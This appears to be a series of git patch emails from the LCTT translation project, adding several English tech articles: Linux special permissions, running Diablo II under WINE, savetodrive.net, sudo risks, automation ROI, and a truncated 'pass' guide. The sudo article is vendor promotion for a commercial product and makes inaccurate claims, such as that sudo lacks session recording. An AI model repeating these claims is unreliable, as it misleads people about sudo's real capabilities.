4096 Nov 1 17:25 test + +``` + +This time the `s` is present in place of the executable bit on the group sector. + +### The sticky bit + +The sticky bit works in a different way: while it has no effect on files, when used on a directory, all the files in said directory will be modifiable only by their owners. A typical case in which it is used, involves the `/tmp` directory. Typically this directory is writable by all users on the system, so to make impossible for one user to delete the files of another one, the sticky bit is set: +``` + +$ ls -ld /tmp +drwxrwxrwt. 14 root root 300 Nov 1 16:48 /tmp + +``` + +In this case the owner, the group, and all other users, have full permissions on the directory (read, write and execute). The sticky bit is identifiable by a `t` which is reported where normally the executable `x` bit is shown, in the "other" section. Again, a lowercase `t` implies that the executable bit is also present, otherwise you would see a capital `T`. + +### How to set special bits + +Just like normal permissions, the special bits can be assigned with the `chmod` command, using the numeric or the `ugo/rwx` format. In the former case the `setuid`, `setgid`, and `sticky` bits are represented respectively by a value of 4, 2 and 1. So for example if we want to set the `setgid` bit on a directory we would execute: +``` +$ chmod 2775 test +``` + +With this command we set the `setgid` bit on the directory, (identified by the first of the four numbers), and gave full privileges on it to it's owner and to the user that are members of the group the directory belongs to, plus read and execute permission for all the other users (remember the execute bit on a directory means that a user is able to `cd` into it or use `ls` to list its content). + +The other way we can set the special permissions bits is to use the ugo/rwx syntax: +``` +$ chmod g+s test +``` + +To apply the `setuid` bit to a file, we would have run: +``` +$ chmod u+s file +``` + +While to apply the sticky bit: +``` +$ chmod o+t test +``` + +The use of special permissions can be very useful in some situations, but if not used correctly the can introduce serious vulnerabilities, so think twice before using them. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits + +作者:[Egidio Docile][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org From 227c30a4a53f65fbcde777512ca41884e8d327a2 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:15:13 +0800 Subject: [PATCH 0854/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Run?= =?UTF-8?q?=20Diablo=20II=20with=20the=20GLIDE-to-OpenGL=20Wrapper?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...blo II with the GLIDE-to-OpenGL Wrapper.md | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md diff --git a/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md b/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md new file mode 100644 index 0000000000..63c079be6e --- /dev/null +++ b/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md @@ -0,0 +1,99 @@ +How to Run Diablo II with the GLIDE-to-OpenGL Wrapper +====== +**[Diablo II][1] is usually a breeze to run on Linux, thanks to WINE and so often times you need no special tricks. However, if you're like me and experience a few glitches and washed out colours in the standard fullscreen mode, you have two options: run the game in windowed mode and go without cinematics, or install a GLIDE-OpenGL wrapper and get the game running properly in its fullscreen glory again, without the glitches and colour problems. I detail how to do that in this article.** + +Yes, that's right, unless you run Diablo II in fullscreen, the cinematics won't work for some reason! I'm fairly sure this happens even on Windows if the game is in windowed mode, so while it's a curious side effect, it is what it is. And this is a game from 2001 we're talking about! + +Old or not though, Diablo II is undoubtedly one of my favourite games of all time. While not exactly Linux related (the game itself has never had a Linux port), I've sunk countless hours into the game in years past. So it's very pleasing to me that the game is very easily playable in Linux using WINE and generally from what I've known the game has needed little to no modification to run properly in WINE. However, it seems since the patches released in the last couple of years that Blizzard removed DirectDraw as a video rendering option from the game for some reason, leaving the game with just one option - Direct3D. Which seems to be the culprit of the fullscreen issues, which apparently even happens on modern Windows machines, so we're not even necessarily talking about a WINE issue here. + +For any users running into the fullscreen glitches and washed out colour palette, as long as you don't care about in-game cinematics and playing the game in a small 800x600 (the game's maximum resolution) window, you could just run the game in windowed mode (with the `-w` switch) and it will work fine. + +Example: +``` +wine ~/.wine/drive_c/Program\ Files\ \(x86\)/Diablo\ II/Game.exe -w +``` + +However, again, no cinematics here. Which may not bother you, but for mine the movies are one of the great and memorable aspects of Diablo II. Thankfully, there is a way to get the game running fullscreen correctly, with working movies, and plus the technique also gets the game running in it's original 4:3 aspect ratio, instead of the weird stretched out 16:9 state it does by default. Again, this may not be your preference, but personally I like it! Let's get to it. + +### The GLIDE to OpenGL wrapper + +Okay, so we said that the game only has one video mode now, that being Direct3D. Well, that's not completely true - the game still has the ancient GLIDE/3DFX mode available and gamers for years have known that for whatever reason, Diablo II actually runs better with GLIDE than Direct3D for hardware that supports it. + +Problem is... no modern video cards actually support the now defunct GLIDE anymore and 3DFX (the company) was taken over long ago by NVIDIA, so the whole thing kind of went the way of the dodo. Running the game with the `-3dfx` switch by default will only net you a crash to desktop (sad face). + +Thankfully, there is a wrapper available, seemingly made specifically for Diablo II, that actually translates the GLIDE interface to OpenGL. And being Linux users, OpenGL certainly suits us. + +So, assuming you have the game installed and fully patched (seriously, it's pretty much just click and install with WINE, exactly as you would in Windows. It's easy), you'll want to download the [GLIDE3-to-OpenGL-Wrapper by Sven Labusch][2]. + +Extract the files from the downloaded archive to your Diablo II game folder (eg. `~/.wine/drive_c/Program Files (x86)/Diablo II/`) + +The following is [from a forum guide][3] originally for Windows users, but it worked fine for me on Linux as well. The first two steps you should have already done, but then follow the instructions to configure the wrapper. You'll obviously have to make sure that glide-init.exe is executed with WINE. + +> 1) download GLIDE WRAPPER ( ). +> 2) extract file in the Diablo 2 folder, where the 'Diablo II.exe' is. +> 3) launch glide-init.exe. +> 4) Click on 'English/Deutsch' to change the language to english. +> 5) Click on 'OpenGL Info', then 'Query OpenGL info', wait for the query to finish. +> 6) Click on 'Setting': +> -uncheck 'windows-mode'. +> -check 'captured mouse'. +> -uncheck 'keep aspect ratio'. +> -uncheck 'vertical synchronization'. +> -select 'no' for 'fps-limit'. +> -select '1600x1200' for 'static size. +> -uncheck 'window extra'. +> -select 'auto' for 'refreshrate'. +> -check 'desktopresolution'. +> 7) Click on 'renderer': +> -select '64 mb' for 'texture-memory'. +> -select '2048x2048' for 'buffer texture size'. +> -uncheck ALL box EXCEPT 'shader-gama'. +> 8) Click on 'Extension': +> -check ALL box. +> 9) Click on 'Quit'. + +Make sure to follow that procedure exactly. + +Now, you should be able to launch the game with the `-3dfx` switch and be all good! +``` +wine ~/.wine/drive_c/Program\ Files\ \(x86\)/Diablo\ II/Game.exe -3dfx +``` + +![][4] + +Yes, the black bars will be unavoidable with the 4:3 aspect ratio (I'm playing on a 27 inch monitor with 1080p resolution), but at least the game looks as it was originally intended. Actually playing the game I don't even notice the black borders. + +### Making the switch persistent + +If you want the game to always launch with the `-3dfx` switch, even from the applications menu shortcut, then simply open the .desktop file with your favourite text editor. + +Example (with the Lord of Destruction expansion installed): +``` +gedit .local/share/applications/wine/Programs/Diablo\ II/Diablo\ II\ -\ Lord\ of\ Destruction.desktop +``` + +And simply add the `-3dfx` switch to the end of the line beginning with " **Exec=** ". Make sure it's at the very end! And then save and exit. + +And that's it! Running the game as standard from your applications menu should start the game up in its GLIDE/OpenGL magical glory. + +Happy demon slaying! + +### About the author + +Andrew Powell is the editor and owner of The Linux Rain who loves all things Linux, gaming and everything in between. + +-------------------------------------------------------------------------------- + +via: http://www.thelinuxrain.com/articles/how-to-run-diablo-2-glide-opengl-wrapper + +作者:[Andrew Powell][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.thelinuxrain.com +[1]:http://us.blizzard.com/en-us/games/d2/ +[2]:http://www.svenswrapper.de/english/downloads.html +[3]:https://us.battle.net/forums/en/bnet/topic/20752595513 +[4]:http://www.thelinuxrain.com/content/01-articles/198-how-to-run-diablo-2-glide-opengl-wrapper/diablo2-linux.jpg From 5f8a898d8f31721c242d999000df3429536ab529 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:15:47 +0800 Subject: [PATCH 0855/1627] add done: 20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md --- ...120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md b/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md index 63c079be6e..42c08d703c 100644 --- a/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md +++ b/sources/tech/20171120 How to Run Diablo II with the GLIDE-to-OpenGL Wrapper.md @@ -1,5 +1,7 @@ How to Run Diablo II with the GLIDE-to-OpenGL Wrapper ====== +![](http://www.thelinuxrain.com/content/01-articles/198-how-to-run-diablo-2-glide-opengl-wrapper/headimage.jpg) + **[Diablo II][1] is usually a breeze to run on Linux, thanks to WINE and so often times you need no special tricks. However, if you're like me and experience a few glitches and washed out colours in the standard fullscreen mode, you have two options: run the game in windowed mode and go without cinematics, or install a GLIDE-OpenGL wrapper and get the game running properly in its fullscreen glory again, without the glitches and colour problems. I detail how to do that in this article.** Yes, that's right, unless you run Diablo II in fullscreen, the cinematics won't work for some reason! I'm fairly sure this happens even on Windows if the game is in windowed mode, so while it's a curious side effect, it is what it is. And this is a game from 2001 we're talking about! From 8e63f5fade11903497c44bcf68627c1eba6b9d56 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:24:54 +0800 Subject: [PATCH 0856/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Save=20Files=20?= =?UTF-8?q?Directly=20To=20Google=20Drive=20And=20Download=2010=20Times=20?= =?UTF-8?q?Faster?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ogle Drive And Download 10 Times Faster.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md diff --git a/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md new file mode 100644 index 0000000000..3b48f4b47f --- /dev/null +++ b/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md @@ -0,0 +1,66 @@ +Save Files Directly To Google Drive And Download 10 Times Faster +====== + +![](http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg) + +So recently I had to download the update package for my phone but when I started downloading it, I found it was too big in size. Approximately 1.5 GigaByte. + +[![downloading miui update from chorme][1]][1] + +Considering the download speed it would have taken me at least 1 - 1.5 hour to download that file and honestly, I didn't have much time. Now my download speed may be slow but my ISP has Google Peering. Which means that I get incredible speeds on All Google products like Google Drive, Youtube, and PlayStore. + +So I found a web-service called [savetodrive][2]. This website can save files from the web directly to your Google Drive folder. And then you can download it from your google drive which will be much faster. + +So let's see how to do it. + +### **Step 1** + +Get the Download URL of the file. Copy it to your clipboard. + +### **Step 2** + +Head over to [savetodrive][3] and click on Authenticate. + +[![savetodrive to save files to cloud drive][4]][4] + +This will ask for your permissions to use google drive. Click on Allow. + +[![http://www.zdnet.com/article/linux-totally-dominates-supercomputers/][5]][5] + +### **Step 3** + +You will see the following page again. Just enter the download link in the url box and click on Upload. + +[![savetodrive download file directly to cloud][6]][6] + +You will start seeing upload progress bar. You can see that the upload speed is 48 MBps, So it will upload my 1.5 GB file in about 30-35 seconds. Once that is done, head over to your Google Drive and you will see the uploaded file. + +[![google drive savetodrive][7]][7] + +So the file that begins with **miui** is my file that I just uploaded. Now I can download it at great speed. + +[![how to download miui update from browser][8]][8] + +Now you can see my download speed is around 5 Mbps so I will download the that file in 5-6 minutes. + +So that was it guys. I always download my files like this. The service is completely free of charge and totally amazing. + +-------------------------------------------------------------------------------- + +via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster + +作者:[Rishabh Kandari][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png +[2]:https://savetodrive.net/ +[3]:http://www.savetodrive.net +[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg +[6]:http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png +[7]:http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png +[8]:http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png From fca53a854d56c8ccf5acbfc6f90ae5ebc2b9acae Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:32:47 +0800 Subject: [PATCH 0857/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Four=20Hidden?= =?UTF-8?q?=20Costs=20and=20Risks=20of=20Sudo=20Can=20Lead=20to=20Cybersec?= =?UTF-8?q?urity=20Risks=20and=20Compliance=20Problems=20on=20Unix=20and?= =?UTF-8?q?=20Linux=20Servers?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ance Problems on Unix and Linux Servers.md | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 sources/tech/20171020 Four Hidden Costs and Risks of Sudo Can Lead to Cybersecurity Risks and Compliance Problems on Unix and Linux Servers.md diff --git a/sources/tech/20171020 Four Hidden Costs and Risks of Sudo Can Lead to Cybersecurity Risks and Compliance Problems on Unix and Linux Servers.md b/sources/tech/20171020 Four Hidden Costs and Risks of Sudo Can Lead to Cybersecurity Risks and Compliance Problems on Unix and Linux Servers.md new file mode 100644 index 0000000000..6acb15c7ec --- /dev/null +++ b/sources/tech/20171020 Four Hidden Costs and Risks of Sudo Can Lead to Cybersecurity Risks and Compliance Problems on Unix and Linux Servers.md @@ -0,0 +1,91 @@ +Four Hidden Costs and Risks of Sudo Can Lead to Cybersecurity Risks and Compliance Problems on Unix and Linux Servers +====== +It is always a philosophical debate as to whether to use open source software in a regulated environment. Open source software is crowd sourced, and developers from all over the world contribute to packages that are later included in Operating System distributions. In the case of ‘sudo’, a package designed to provide privileged access included in many Linux distributions, the debate is whether it meets the requirements of an organization, and to what level it can be relied upon to deliver compliance information to auditors. + +There are four hidden costs or risks that must be considered when evaluating whether sudo is meeting your organization’s cybersecurity and compliance needs on its Unix and Linux systems, including administrative, forensics and audit, business continuity, and vendor support. Although sudo is a low-cost solution, it may come at a high price in a security program, and when an organization is delivering compliance data to satisfy auditors. In this article, we will review these areas while identifying key questions that should be answered to measure acceptable levels of risk. While every organization is different, there are specific risk/cost considerations that make a strong argument for replacing sudo with a commercially-supported solution. + +### Administrative Costs + +There are several hidden administrative costs is using sudo for Unix and Linux privilege management. For example, with sudo, you also need to run a third-party automation management system (like CFEngine or Puppet) plus third party authentication modules on the box. And, if you plan to externalize the box at all, you’re going to have to replace sudo with that supplier’s version of sudo. So, you end up maintaining sudo, a third-party management system, a third-party automation system, and may have to replace it all if you want to authenticate against something external to the box. A commercial solution would help to consolidate this functionality and simplify the overall management of Unix and Linux servers. + +Another complexity with sudo is that everything is local, meaning it can be extremely time-consuming to manage as environments grow. And as we all know, time is money. With sudo, you have to rely on local systems on the server to keep logs locally, rotate them, send them to an archival environment, and ensure that no one is messing with any of the other related subsystems. This can be a complex and time-consuming process. A commercial solution would combine all of this activity together, including binary pushes and retention, upgrades, logs, archival, and more. + +Unix and Linux systems by their very nature are decentralized, so managing each host separately leads to administrative costs and inefficiencies which in turn leads to risks. A commercial solution centralizes management and policy development across all hosts, introducing enterprise level consistency and best practices to a privileged access management program. + +### Forensics & Audit Risks + +Administrative costs aside, let’s look at the risks associated with not being able to produce log data for forensic investigations. Why is this a challenge for sudo? The sudo package is installed locally on individual servers, and configuration files are maintained on each server individually. There are some tools such as Puppet or Chef that can monitor these files for changes, and replace files with known good copies when a change is detected, but those tools only work after a change takes place. These tools usually operate on a schedule, often checking once or twice per day, so if a system is compromised, or authorization files are changed, it may be several hours before the system is restored to a known good state. The question is, what can happen in those hours? + +There is currently no keystroke logging within sudo, and since any logs of sudo activity are stored locally on servers, they can be tampered with by savvy administrators. Event logs are typically collected with normal system logs, but once again, this requires additional configuration and management of these tools. When advanced users are granted administrative access on servers, it is possible that log data can be modified, or deleted, and all evidence of their activities erased with very little indication that events took place. Now, the question is, has this happened, or is it continuing to happen? + +With sudo, there is no log integrity – no chain of custody on logs – meaning logs can’t be non-repudiated and therefore can’t be used in legal proceedings in most jurisdictions. This is a significant risk to organizations, especially in criminal prosecution, termination, or other disciplinary actions. Third-party commercial solutions’ logs are tamper-proof, which is just not possible with sudo. + +Large organizations typically collect a tremendous amount of data, including system logs, access information, and other system information from all their systems. This data is then sent to a SIEM for analytics, and reporting. SIEM tools do not usually deliver real-time alerting when uncharacteristic events happen on systems, and often configuration of events is difficult and time consuming. For this reason, SIEM solutions are rarely relied upon for alerting within an enterprise environment. Here the question is, what is an acceptable delay from the time an event takes place until someone is alerted? + +Correlating log activity with other data to determine a broader pattern of abuse is also impossible with sudo. Commercial solutions gather logs into one place with searchable indices. Some commercial solutions even correlate this log data against other sources to identify uncharacteristic behavior that could be a warning that a serious security issue is afoot. Commercial solutions therefore provide greater forensic benefits than sudo. + +Another gotcha with sudo is that change management processes can’t be verified. It is always a best practice to review change records, and to validate that what was performed during the change matches the implementation that was proposed. ITIL and other security frameworks require validation of change management practices. Sudo can’t do this. Commercial solutions can do this through reviewing session command recording history and file integrity monitoring without revealing the underlying session data. + +There is no session recording with sudo. Session logs are one of the best forensic tools available for investigating what happened on servers. It’s human nature that people tend to be more cautious when they know they can be watched. Sudo doesn’t provide session recordings. + +Finally, there is no segregation of duties with sudo. Most security and compliance frameworks require true separation of duties, and using a tool such as sudo just “skins” over the segregation of duties aspect. All of these deficiencies – lack of log integrity, lack of session monitoring, no change management – introduces risk when organizations must prove compliance or investigate anomalies. + +### Business Continuity Risks + +Sudo is open source. There is no indemnification if there is a critical error. Also, there is no rollback with sudo, so there is always the chance that mistakes will bring and entire system down with no one to call for support. Sure, it is possible to centralize sudo through a third-party tool such as Puppet or CFEngine, but you still end up managing multiple files across multiple groups of systems manually (or managed as one huge policy). With this approach, there is greater risk that mistakes will break every system at once. A commercial solution would have policy roll-back capability that would limit the damage done. + +### Lack of Enterprise Support + +Since sudo is an open source package, there is no official service level for when packages must be updated to respond to identified security flaws, or vulnerabilities. By mid-2017, there have already been two vulnerabilities identified in sudo with a CVSS score greater than six (CVE Sudo Vulnerabilities). Over the past several years, there have been a number of vulnerabilities discovered in sudo that took as many as three years to patch ([CVE-2013-2776][1] , [CVE-2013-2777][2] , [CVE-2013-1776][3]). The question here is, what exploits have been used in the past several months or years? A commercial solution that replaces sudo would eliminate this problem. + +### Ten Questions to Measure Risk in Your Unix and Linux Environment + +Unix and Linux systems present high-value targets for external attackers and malicious insiders. Expect to be breached if you share accounts, provide unfettered root access, or let files and sessions go unmonitored. Gaining root or other privileged credentials makes it easy for attackers to fly under the radar and access sensitive systems and data. And as we have reviewed, sudo isn’t going to help. + +In balancing costs vs. an acceptable level of risk to your Unix and Linux environment, consider these 10 questions: + +1. How much time are Unix/Linux admins spending just trying to keep up? Can your organization benefit from automation? + +2. Are you able to keep up with the different platform and version changes to your Unix/Linux systems? + +3. As you grow and more hosts are added, how much more time will admins need to keep up with policy? Is adding personnel an option? + +4. What about consistency across systems? Modifying individual sudoers files with multiple admins makes that very difficult. Wouldn’t systems become siloed if not consistently managed? + +5. What happens when you bring in new or different Linux or Unix platforms? How will that complicate the management of the environment? + +6. How critical is it for compliance or legal purposes to know whether a policy file or log has been tampered with? + +7. Do you have a way to verify that the sudoers file hasn’t been modified without permission? + +8. How do you know what admins actually did once they became root? Do you have a command history for their activity? + +9. What would it cost the business if a mission-critical Unix/Linux host goes down? With sudo, how quickly could the team troubleshoot and fix the problem? + +10. Can you demonstrate to the board that you have a backup if there is a significant outage? + +### Benefits of Using a Commercial Solution + +Although they come at a higher cost than free open source solutions, commercial solutions provide an effective way to mitigate the general issues related to sudo. Solutions that offer centralized management ease the pressure on monitoring and maintaining remote systems, centralized logging of events, and keystroke recording are the cornerstone of audit expectations for most enterprises. + +Commercial solutions usually have a regular release cycle, and can typically deliver patches in response to vulnerabilities in hours, or days from the time they’re reported. Commercial solutions like PowerBroker for Unix & Linux by BeyondTrust provide event logging on separate infrastructure that is inaccessible to privileged users, and this eliminates the possibility of log tampering. PowerBroker also provides strong, centralized policy controls that are managed within an infrastructure separate from systems under management; this eliminates the possibility of rogue changes to privileged access policies in server environments. Strong policy control also moves security posture from ‘Respond’ to ‘Prevent’, and advanced features provide the ability to integrate with other enterprise tools, and conditionally alert when privileged access sessions begin, or end. + +### Conclusion + +For organizations that are serious about incorporating a strong privileged access management program into their security program, there is no question that a commercial product delivers much better than an open source offering such as sudo. Eliminating the possibility of malicious behavior using strong controls, centralized log file collection, and centralized policy management is far better than relying on questionable, difficult to manage controls delivered within sudo. In calculating an acceptable level of risk to your tier-1 Unix and Linux systems, all of these costs and benefits must be considered. + + +-------------------------------------------------------------------------------- + +via: http://www.linuxjournal.com/content/four-hidden-costs-and-risks-sudo-can-lead-cybersecurity-risks-and-compliance-problems-unix-a + +作者:[Chad Erbe][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxjournal.com/users/chad-erbe +[1]:https://www.cvedetails.com/cve/CVE-2013-2776/ +[2]:https://www.cvedetails.com/cve/CVE-2013-2777/ +[3]:https://www.cvedetails.com/cve/CVE-2013-1776/ From a376418dc2dcdddb4d9023bc82a21827415bf67e Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:38:22 +0800 Subject: [PATCH 0858/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20impr?= =?UTF-8?q?ove=20ROI=20on=20automation:=204=20tips?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ow to improve ROI on automation- 4 tips.md | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 sources/tech/20171116 How to improve ROI on automation- 4 tips.md diff --git a/sources/tech/20171116 How to improve ROI on automation- 4 tips.md b/sources/tech/20171116 How to improve ROI on automation- 4 tips.md new file mode 100644 index 0000000000..ce1c2afb45 --- /dev/null +++ b/sources/tech/20171116 How to improve ROI on automation- 4 tips.md @@ -0,0 +1,76 @@ +How to improve ROI on automation: 4 tips +====== + +![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_it_investments_2.png?itok=Ut1XIIBN) +Automation technologies have generated plenty of buzz during the past few years. COOs and operations teams (and indeed, other business functions) are thrilled at the prospect of being able to redefine how costs have historically increased as work volume rose. + +Robotic process automation (RPA) seems to promise the Holy Grail to operations: "Our platform provides out-of-box features to meet most of your daily process needs - checking email, saving attachments, getting data, updating forms, generating reports, file and folder operations. Building bots can be as easy as configuring these features and chaining them together, rather than asking IT to build them." It's a seductive conversation. + +Lower cost, fewer errors, better compliance with procedures - the benefits seem real and achievable to COOs and operations leaders. The fact that RPA tools promise to pay for themselves from the operational savings (with short payback periods) makes the business case even more attractive. + +Automation conversations tend to follow a similar script: COOs and their teams want to know how automating operations can benefit them. They want to know about RPA platform features and capabilities, and they want to see real-world examples of automation in action. The journey from this point to a proof-of-concept implementation is often short. + +**[ For advice on implementing AI technology, see our related article, [Crafting your AI strategy: 3 tips][1]. ]** + +But the reality of automation benefits can sometimes lag behind expectations. Companies that adopt RPA may find themselves questioning its ROI after implementation. Some express disappointment about not seeing the expected savings, and confusion as to why. + +## Are you automating the wrong things? + +What could explain the gap between the promise and reality of operational automation in these cases? To analyze this, let's explore what typically happens after the decision to proceed with an automation proof-of-concept project (or a full-blown implementation, even) has been made. + +After deciding that automation is the path to take, the COO typically asks operational leaders and their teams to decide which processes or tasks should be automated. While participation should be encouraged, this type of decision-making sometimes leads to sub-optimal choices in automation candidates. There are a few reasons for this: + +First, team leaders often have a "narrow field of deep vision:" They know their processes and tasks well, but might not be deeply familiar with those that they do not participate in (especially if they have not had wide operations exposure). This means that they are able to identify good automation candidates within their own scope of work, but not necessarily across the entire operations landscape. Softer factors like "I want my process to be picked as the first automation candidate" can also come into play. + +Second, candidate process selection can sometimes be driven by matching automation features and capabilities rather than by the value of automation. A common misunderstanding is that any task that includes activities like email or folder monitoring, downloads, calculations, etc. is automatically a good candidate for automation. If automating such tasks doesn't provide value to the organization, they are not the right candidates. + +So what can leaders do to ensure that their automation implementation delivers the ROI they are seeking? Take these four steps, up front: + +## 1. Educate your teams + +It's very likely that people in your operations team, from the COO downward, have heard of RPA and operational automation. It's equally likely that they have many questions and concerns. It is critical to address these issues before you start your implementation. + +Proactively educating the operations team can go a long way in drumming up enthusiasm and buy-in for automation. Training can focus on what automation and bots are, what role they play in a typical process, which processes and tasks are best positioned for automation, and what the expected benefits of automation are. + +**Recommendation** : Ask your automation partner to conduct these team education sessions, with your moderation: They will likely be eager to assist. The leadership should shape the message before it is delivered to the broader team. + +"The first step in automation is to get to know your processes better." + +## 2. Examine your internal processes + +The first step in automation is to get to know your processes better. Every RPA implementation should be preceded by a process inventory, activity analysis, and cost/value mapping exercise. + +It's critical to understand where the value add (or cost, if value is unavailable) happens in the process. And this needs to be done at a granular level for each process or every task. + +This will help you identify and prioritize the right candidates for automation. Because of the sheer number of tasks that can or may need to be automated, processes typically get automated in phases, so prioritization is key. + +**Recommendation** : Set up a small working team, with participation from each group within Operations. Nominate a coordinator from each group - typically a group leader or team manager. Conduct a workshop at the group level to build the process inventory, identify candidate processes, and drive buy-in. Your automation partners are likely to have accelerators - questionnaires, scorecards etc. - that can help you speed up this activity. + +## 3. Provide strong direction on business priorities + +Implementations often involve driving consensus (and sometimes tie-breaking) between operations teams on process selection and automation priorities, based on business value. Though team participation remains a critical part of the analysis and implementation exercises, leaders should own final decision-making. + +**Recommendation** : Schedule regular sessions to get updates from the working teams. In addition to factors like driving consensus and buy-in, teams will also look to leaders for directional decisions on ROI, platform selection, and automation prioritization at the group level. + +## 4. CIO and COO should drive close cooperation + +Automation rollouts are much smoother when there is close cooperation between the operations and technology teams. The COO needs to help drive this coordination with the CIO's team. + +Involvement and oversight of the COO and other operations leaders are critical for successful automation implementations. + +**Recommendation** : The COO and CIO team should set up a joint working group (a "war room") with the third-party automation partners. Responsibilities for each participant should be clearly demarcated and tracked on an ongoing basis. Ideally, the COO and CIO should dedicate at least one resource to the group, at least during the initial rollouts. + +Automation can create significant value for an organization. However, to achieve optimal returns on the investment in their automation journey, CIOs must map before they leap. + +-------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/how-improve-roi-automation-4-tips + +作者:[Rajesh Kamath][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/rajesh-kamath +[1]:https://enterprisersproject.com/article/2017/11/crafting-your-ai-strategy-3-tips?sc_cid=70160000000h0aXAAQ From aedeb3da9d914357c1b920667a0eb09cb708ed66 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:42:47 +0800 Subject: [PATCH 0859/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20orga?= =?UTF-8?q?nize=20your=20passwords=20using=20pass=20password=20manager?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...r passwords using pass password manager.md | 150 ++++++++++++++++++ 1 file changed, 150 insertions(+) create mode 100644 sources/tech/20171121 How to organize your passwords using pass password manager.md diff --git a/sources/tech/20171121 How to organize your passwords using pass password manager.md b/sources/tech/20171121 How to organize your passwords using pass password manager.md new file mode 100644 index 0000000000..5cd203e403 --- /dev/null +++ b/sources/tech/20171121 How to organize your passwords using pass password manager.md @@ -0,0 +1,150 @@ +translating by lujun9972 +How to organize your passwords using pass password manager +====== + +### Objective + +Learn to organize your passwords using the "pass" password manager on linux + +### Requirements + + * Root permissions needed to install required packages + +### Difficulty + +EASY + +### Conventions + + * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command + * **$** \- given command to be executed as a regular non-privileged user +### Introduction + +If you have the good habit to never use the same password for more than one purpose, you have probably already felt the need for a password manager. There are many alternatives to choose from on linux, both proprietary (if you dare) and open source. If you, like me, think that simplicity it's the way to go, you may be interested in knowing however to use the `pass` utility. + +### First steps + +Pass it's a password manager that it's really a wrapper on well trusted and useful tools that you probably already use every day, like `gpg` and `git`. Although graphical interfaces exists for it, it is designed to work from command line: therefore it will work even on headless machines. + +### Step 1 - installation + +Pass it's easily available on the majority of linux distributions, you can obtain via package manager: + +#### Fedora +``` +# dnf install pass +``` + +#### RHEL and CentOS + +Pass is not available in the official repositories, but you can obtain it from `epel`. To make the latter source available on CentOS7, all you have to do is: +``` +# yum install 